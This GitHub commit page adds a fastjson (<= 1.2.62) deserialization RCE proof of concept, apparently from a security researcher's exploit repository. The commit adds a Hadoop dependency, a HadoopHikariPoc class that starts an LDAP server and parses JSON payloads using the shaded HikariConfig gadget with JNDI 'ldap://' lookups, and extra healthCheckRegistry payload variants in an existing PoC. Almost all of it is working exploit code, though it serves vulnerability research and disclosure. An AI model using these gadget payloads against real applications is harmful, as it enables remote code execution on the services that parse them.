Skip to content

Commit 14e6c7c

Browse files
author
threedr3am
committed
feat:fastjson新gadget(hadoop)
1 parent a5839c5 commit 14e6c7c

File tree

3 files changed

+43
-0
lines changed

3 files changed

+43
-0
lines changed

fastjson/pom.xml

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -49,5 +49,12 @@
4949
<artifactId>xbean-reflect</artifactId>
5050
<version>4.15</version>
5151
</dependency>
52+
53+
<!-- https://mvnrepository.com/artifact/org.apache.hadoop/hadoop-client-minicluster -->
54+
<dependency>
55+
<groupId>org.apache.hadoop</groupId>
56+
<artifactId>hadoop-client-minicluster</artifactId>
57+
<version>3.2.1</version>
58+
</dependency>
5259
</dependencies>
5360
</project>

fastjson/src/main/java/com/threedr3am/bug/fastjson/HadoopHikariPoc.java

Lines changed: 34 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,34 @@
1+
package com.threedr3am.bug.fastjson;
2+
3+
import com.alibaba.fastjson.JSON;
4+
import com.alibaba.fastjson.parser.ParserConfig;
5+
import com.threedr3am.bug.common.server.LdapServer;
6+
7+
/**
8+
* fastjson <= 1.2.62 RCE,需要开启AutoType (report by threedr3am to ASRC)
9+
*
10+
* <dependency>
11+
* <groupId>org.apache.hadoop</groupId>
12+
* <artifactId>hadoop-client-minicluster</artifactId>
13+
* <version>3.2.1</version>
14+
* </dependency>
15+
*
16+
* @author threedr3am
17+
*/
18+
public class HadoopHikariPoc {
19+
static {
20+
//rmi server示例
21+
// RmiServer.run();
22+
23+
//ldap server示例
24+
LdapServer.run();
25+
}
26+
27+
public static void main(String[] args) {
28+
ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
29+
30+
String payload = "{\"@type\":\"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig\",\"metricRegistry\":\"ldap://localhost:43658/Calc\"}";
31+
String payload2 = "{\"@type\":\"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig\",\"healthCheckRegistry\":\"ldap://localhost:43658/Calc\"}";
32+
JSON.parse(payload);
33+
}
34+
}

fastjson/src/main/java/com/threedr3am/bug/fastjson/HikariConfigPoc.java

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -33,7 +33,9 @@ public static void main(String[] args) {
3333
ParserConfig.global.setAutoTypeSupport(true);
3434

3535
// String payload = "{\"@type\":\"com.zaxxer.hikari.HikariConfig\",\"metricRegistry\":\"rmi://localhost:43657/Calc\"}";
36+
// String payload = "{\"@type\":\"com.zaxxer.hikari.HikariConfig\",\"healthCheckRegistry\":\"rmi://localhost:43657/Calc\"}";
3637
String payload = "{\"@type\":\"com.zaxxer.hikari.HikariConfig\",\"metricRegistry\":\"ldap://localhost:43658/Calc\"}";
38+
String payload2 = "{\"@type\":\"com.zaxxer.hikari.HikariConfig\",\"healthCheckRegistry\":\"ldap://localhost:43658/Calc\"}";
3739
JSON.parse(payload);
3840
}
3941
}

0 commit comments

Comments
 (0)